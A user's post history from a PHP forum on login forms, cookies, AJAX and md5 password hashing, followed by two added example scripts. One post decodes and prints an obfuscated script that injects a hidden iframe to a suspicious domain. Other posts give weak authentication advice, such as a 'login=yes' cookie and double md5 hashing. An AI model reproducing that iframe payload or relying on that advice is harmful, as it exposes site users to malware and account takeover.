rv20

Everything posted by rv20

  1. Ok, here is some cut-down code. It works OK; the only three things are: 1) How can I hide the ?login=invalidusername in the URL? 2) Is this secure? 3) If the user doesn't enter a password and gets the ?login=invalidusername URL and then refreshes the page, how do I remove the ?login=invalidusername and go back to the http://login.php? How else would you suggest returning the response from the PHP script, if not by appending the ?login=invalidusername?

     <?php
     // HTTP_REFERER is sent by the client and may be missing, so read it defensively.
     $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
     if (($_SERVER['REQUEST_METHOD'] == "POST") && (parse_url($referer, PHP_URL_HOST) == "127.0.0.1")) {
         $username = isset($_POST['user']) ? $_POST['user'] : '';
         if ($username == "") {
             // Empty username: redirect back to this page with an error flag in the URL.
             $url_self = htmlentities($_SERVER['PHP_SELF']) . "?login=invalidusername";
             header("Location: $url_self");
             exit; // stop so the page body is not also sent with the redirect
         }
     }
     ?>
     <html>
     <head>
     </head>
     <body>
     <form action="<?php echo htmlentities($_SERVER['PHP_SELF']); ?>" method="post">
         <input type="text" name="user"/>
         <input type="submit">
         <input type="button" value="button">
     </form>
     <div id="val_errors" style="width:200px;height:200px;border:solid;">
     <?php
     // Show the message only when the redirect above set the flag.
     if (isset($_GET['login']) && $_GET['login'] == "invalidusername") {
         echo "Please enter a username";
     }
     ?>
     </div>
     </body>
     </html>
  2. So if you post a form you can do it the regular way or you can use AJAX. I would rather do it the regular way, but this results in having to refresh (or redirect, depending on how you call it) the page twice; twice because you firstly have to actually post the form (btw I have PHP and HTML on the same page), so posting the form,

     <form action="<?php echo htmlentities($_SERVER['PHP_SELF']); ?>" method="post">

     Then if there are validation errors like blank fields, invalid email etc., you have to refresh again to clear the $_POST[] variables, so something like,

     if ($_POST['user'] == "") {
         // send the browser back to this same page
         // (also true on a plain GET, where $_POST['user'] is not set)
         header("Location: " . htmlentities($_SERVER['PHP_SELF']));
         exit;
     }

     Ok, this above example might result in a permanent loop but with a few tweaks .......... I think PHP_SELF clears the $_POST vars, otherwise if you reload the page the $_POST vars are reposted, which can result in a variety of problems. Big deal, you might say, reposting twice, but the more you get involved in your own project the more you want it to be as user friendly as possible. I just sense that AJAX is OTT though.
  3. I know all this, but this thread has gone a bit off course from my original post, and some of the arguments are also a bit weak, like yours with your example of having the same hash for two different passwords (collisions). According to this site, http://unixwiz.net/techtips/iguide-crypto-hashes.html there has never been a collision found yet for an md5 hash. And anyway collisions don't come into it, as it is the hash you are replicating from the password, so if you manage to generate the right hash from a cracker, ok there could be another "string" out there that produces the same hash but it doesn't matter as you have found the hash for your password. I will need to check up on that; the wiki entry for rainbow tables uses md5 (md5 ($password . $salt)) with no mention of collisions. I think your collisions problem is a bit far-fetched, as from what I have looked at you have more chance of building a rainbow table to crack a salted password than you do of having a collision. I think you talk the talk.
  4. Not entirely sure what the src is, but it seems to write an iframe of, <iframe src="http://foxionserl.com/" width="1" height="3"> I ran it and it opened Acrobat Reader for a few secs, then nothing. The domain foxionserl is registered to Herbert Elliott http://www.whois.net/whois/foxionserl.com
  5. I'm sorry, but please please please learn to bloody read. As has already been stated, applying the md5 algorithm more than once increases the chance of collisions. Hence it is less secure. Why is that so hard to understand? No need for the star -- it's trivially true. There has to be a fixed number of inputs that you have to perform in order to generate all the outputs. Whether or not that's equal to the number of different hashes is a different question (which, incidentally, I'm guessing is false -- I bet my bottom dollar that there are collisions within the first |sigma|^32 items [where sigma is the alphabet. I would use 16 (hex) but I'm not convinced md5 is limited to hex but I cba to check]). What on earth do you mean by 'computationally secure'? Sha1 would require more processing power in order to generate a collision than md5, and a salted password even more so. But that doesn't imply that it is totally secure. Increased chance, what about 1 zillion to one?
  6. Yeah, it is just js in char code form; if you do a chr(number) on those codes you will decode it. I wrote a little script to do that; the result is,

     var xew=9871311;var ghg45="foxi";var w="on";var re6="serl.";var h2h="com";var a="ifr";var s="htt";document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'rame>'); function d(){var s=4345;} var rre=8828382

     <?php
     // Comma-separated character codes taken from the obfuscated script.
     $str_string = "118,97,114,32,120,101,119,61,57,56,55,49,51,49,49,59,118,97,114,32,103,104,103,52,53,61,34,102,111,120,105,34,59,"
         . "118,97,114,32,119,61,34,111,110,34,59,118,97,114,32,114,101,54,61,34,115,101,114,108,46,34,59,118,97,114,32,104,50,"
         . "104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,"
         . "111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,"
         . "39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,"
         . "43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,"
         . "62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,100,40,41,123,118,97,114,"
         . "32,115,61,52,51,52,53,59,125,32,118,97,114,32,114,114,101,61,56,56,50,56,51,56,50";
     $pieces = explode(",", $str_string);
     // Turn each code back into its character and print the decoded source.
     for ($i = 0; $i < count($pieces); $i++) {
         $l = chr((int) trim($pieces[$i]));
         echo $l;
     }
     ?>
  7. I suppose it is just IE6, IE7 and IE8, as, as far as I know, you can't have them all installed on your PC at once, or can you? Is there some website out there in the internets that shows you the results of your site on all browsers?
  8. I think that what rv20 is trying to get at is that he doesn't care what the original value is; if he finds a value that creates that hash it is good enough, because even if it's a collision it will allow him access to whatever that "password"-protected area allows access to.... right rv20? Correct, but realise I am wanting to know this so as to know how to secure against such a thing. For example, before I asked this question I may well have stored the username and an md5($password) in the cookie; I now realise that there are quite a few valid ways to steal a cookie and therefore if you got the hash you could easily run it through a bruter. This is pretty unlikely to happen but why not learn the basics, also quite interesting?? So now I know to do at least an md5(md5($password . $salt)) and you can't really go wrong.
  9. My script produces random output because I give it random input. If you use the same input you'll get the same output. Try it out. Then you probably need to work on your math skills. Do you understand the post I just wrote? If foo => baz and bar => baz and I just tell you "baz", how are you going to know if I had "foo" or "bar"? Well, if I run your script 3 times then I get these 3 different hashes for a start, f68902640462f40cb28cf80a0e468b289951852c33d72161ffa5c76650f9bf11 df345263f958e654c54badb27052f138e064594b1bc1074b869266f7f2aad2ba b5f5d34abad06ad189324f7f7414093f4d683a3d32b4e7ab8e92adcda08c490d Second point, I am not saying you can reverse a hash, I am saying if you try every possible combination of passwords then eventually you will hit the same combination that produces the original hash, called a recursive method. md5('a') = 3454535442 md5('aa') = 8983989932 md5('aaa') = 4534534544 and on and on until, md5($x) = same hash as the one you are trying to crack.. That is what cracking is, not decoding.
  10. I don't understand your point with the sha-256; to me you would be as well with a random number, as that is what it seems to output. So I take it you can't use the sha hashing method to store passwords, as how can you compare hashes for passwords if this sha-256 gives a different hash value for the same password each time it is run? I think my point is totally valid: if someone hashes a password with md5 then all you need to do is run a brute forcer and compare each hash generated by the brute force method to the hash you have. I don't see the problem of calling that cracking.
  11. I know all this, but the main thing was just surprise. I had heard how strong and irreversible md5 was and then saw how easy it was to crack, so I have to ask what is the point; it is actually easier to crack than some simple 5 line home brew encryption function, but as I now know, if you salt it then very difficult.
  12. Yup, that is pretty good, would take some mathematics to crack that if at all possible. You really are missing the point of hashing. Hashing is a one-way process. It cannot be 'cracked'. Yes, you can use rainbow tables. Yes, you can analyse the algorithm in order to increase the chances of collisions. No, you cannot reverse it. For example, if I tell you a number is 6 mod 7, what was the original number? You can't tell me. You can tell me an infinite amount of numbers that are also 6 mod 7, but you cannot guarantee that you're telling me my original number. Therefore, you cannot reverse it. While this is an extremely simple example, it should illustrate the point. NO, I am not missing the point of hashing; for a single pass of md5 this simple brute forcer takes a matter of minutes to crack a 6 character password with [a-z][A-Z][0-9], http://eternalrise.com/blog/brute-force-php-script/ I haven't tried a 7 letter password; the time taken usually goes up, I would guess exponentially. And then yes, rainbow tables, they store every possible hash you can get or something along those lines; with database-based searching this can be pretty fast to crack a password. So that leaves you with md5 combinations like md5(md5) or adding salt. Now after a quick google I see plenty of applications which claim they can crack a salted password. I am not going to bother looking into them, but it wouldn't surprise me if someone has worked something out. So you make out like md5($password) is secure as it is a hash, whereas I can crack it in about 1 min.
  13. If you have a div with and set the body bgcolor to some color then the padding still displays white. I would expect that; is there any way around this though?
  14. Good point. Well, I wouldn't use a cookie anyway, sessions, but you are right of course.
  15. But then how do you know who the user is? Even so, if you had the username I could edit my cookies to have your username and "yes". Well, they log in, so you check their username in the db, and if they check remember me then,

     // a ticked checkbox arrives as a string value, so test that the field is present
     if (isset($_POST['ischecked'])) {
         setcookie("login", "yes");
     }

     or roughly that. Yes, I know you can edit the cookie, javascript:document.cookie='login=yes'; but it's better than actually putting the password in the cookie.
  16. For an auto login, if I was using cookies I would just store yes or no in the cookie, then at the top of each *.php page I would have,

     <?php
     // redirect to the home page when the login cookie says "no"
     if (isset($_COOKIE['login']) && $_COOKIE['login'] == "no") {
         header("Location: home.php");
         exit;
     }

     But you would really use sessions for this, which are just virtual cookies so to speak. And btw these guys are very good coders after looking at their work, they make pretty complex sites; I will email them and ask, as I go to the site a lot. Typos in my first post as well.
  17. This is a bit off topic but, I downloaded an "md5 bruter" cracker, just for learning purposes. Anyway, I set a character set of [a-z][A-Z][0-9] and 3 more symbols :_- I then generated an md5 for a 12 character password in PHP, md5("passpasspass") etc., and fed that md5 into the cracker. Now the cracker tells me that this will take about 32,000 years to crack. How long do you think it would take if you hooked up say 10 supercomputers and coded the cracker in assembler?
  18. Yup, that is pretty good, would take some mathematics to crack that if at all possible.
  19. There is a really cool SC drag and drop, I don't think it would be hard setting it up either, http://demos111.mootools.net/Drag.Cart
  20. Hope this topic is ok here as I would be using PHP to do the encryption.. So I have just worked out how md5 hashes work - I thought md5 made passwords ultra secure - and for a password up to say 6 characters long, including numeric characters, it is very easy to crack by doing a brute force, so I ask what is the point. I am wanting to encrypt passwords in a db and I can't see why my own 'home brew' method should be any more crackable than an md5 hash. What encryption would you recommend? There would need to be a PHP class available.
  21. I just noticed that a site I go to stores their users' username and encrypted(password) in the cookie. I don't see the point; surely the username and password (again it's encrypted) will still have to be stored in a db so that you can write it to the cookie. Why would they do this?
  22. Ok, I am all for hack prevention. Can you outline some hacks (I take it we are talking about ajax hacks) or link me up to a site detailing it..
  23. Why does security go out the window if they disabled js? YouTube uses js/ajax, and if you disable js in FF then you can't view YouTube videos or browse through the comments, as the comments are fetched through ajax. So they don't have a backup, basically the world's most popular site; either enable js or don't use it. I don't see why I should have a problem using ajax??
  24. Guys, you're right, I am talking nonsense here, as I still have to POST anyway and check the db via PHP (in my case). So you say always check server side; so are there security problems or whatever if I do use AJAX, now that I have a nice working generic AJAX setup I can pretty much use for all communication to PHP?
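
Added example, not part of the thread and not rv20's code: one way to do what posts 1 and 2 ask about, returning a validation message without `?login=invalidusername` in the URL and without a re-POST on refresh, using Post/Redirect/Get with a one-time session message. The `/login.php` path, the `csrf` and `flash` names and PHP 7+ are assumptions.

```php
<?php
// Added example: Post/Redirect/Get with a one-time session message.
// Assumptions: PHP 7+, this file is served as /login.php.
session_start();

// Per-session anti-CSRF token issued by the server; HTTP_REFERER is
// client-supplied and may be absent, so it is not used as the check here.
if (empty($_SESSION['csrf'])) {
    $_SESSION['csrf'] = bin2hex(random_bytes(32));
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $token = is_string($_POST['csrf'] ?? null) ? $_POST['csrf'] : '';
    $user  = is_string($_POST['user'] ?? null) ? trim($_POST['user']) : '';

    if (!hash_equals($_SESSION['csrf'], $token)) {
        $_SESSION['flash'] = 'Form expired, please try again';
    } elseif ($user === '') {
        $_SESSION['flash'] = 'Please enter a username';
    } else {
        $_SESSION['flash'] = 'Hello, ' . $user; // escaped when printed below
    }
    // 303 makes the browser follow up with a GET to a fixed path, so a
    // refresh cannot re-send the form and the URL carries no error flag.
    header('Location: /login.php', true, 303);
    exit;
}

// GET: take the message out of the session so it is shown exactly once.
$flash = $_SESSION['flash'] ?? '';
unset($_SESSION['flash']);
?>
<html>
<body>
<form action="/login.php" method="post">
    <input type="hidden" name="csrf" value="<?php echo htmlspecialchars($_SESSION['csrf'], ENT_QUOTES, 'UTF-8'); ?>">
    <input type="text" name="user">
    <input type="submit">
</form>
<div id="val_errors"><?php echo htmlspecialchars($flash, ENT_QUOTES, 'UTF-8'); ?></div>
</body>
</html>
```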
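
Added example, not from the thread: the hash-comparison question in post 10 and the storage question in post 20, worked with PHP's built-in password API, including upgrading a legacy unsalted md5() row at login. The in-memory `$users` array, the `verify_login` name and the sample passwords are constructed for illustration; PHP 7+ is assumed.

```php
<?php
// Added example. Assumptions: PHP 7+; $users stands in for a database table.
// Constructed sample data: alice still has a legacy unsalted md5() hash.
$users = [
    'alice' => md5('passpasspass'),
    'bob'   => password_hash('correct horse', PASSWORD_DEFAULT),
];

function verify_login(array &$users, string $name, string $password): bool
{
    if (!isset($users[$name])) {
        return false;
    }
    $stored = $users[$name];

    if (preg_match('/^[0-9a-f]{32}$/', $stored) === 1) {
        // Legacy row: recompute md5 and compare in constant time.
        $ok = hash_equals($stored, md5($password));
        $upgrade = $ok;
    } else {
        // The stored string carries algorithm, cost and salt, so the check
        // works even though password_hash() output differs on every call.
        $ok = password_verify($password, $stored);
        $upgrade = $ok && password_needs_rehash($stored, PASSWORD_DEFAULT);
    }
    if ($upgrade) {
        // Re-store with a fresh random salt and the current default cost.
        $users[$name] = password_hash($password, PASSWORD_DEFAULT);
    }
    return $ok;
}

// Hash one password twice, compare the two strings, then verify each.
$a = password_hash('passpasspass', PASSWORD_DEFAULT);
$b = password_hash('passpasspass', PASSWORD_DEFAULT);
var_dump($a === $b, password_verify('passpasspass', $a), password_verify('passpasspass', $b));

// Log alice in through the legacy path, check whether her row is still an
// md5 digest, log her in again, then try a wrong password for bob.
var_dump(verify_login($users, 'alice', 'passpasspass'));
var_dump(preg_match('/^[0-9a-f]{32}$/', $users['alice']));
var_dump(verify_login($users, 'alice', 'passpasspass'));
var_dump(verify_login($users, 'bob', 'wrong'));
```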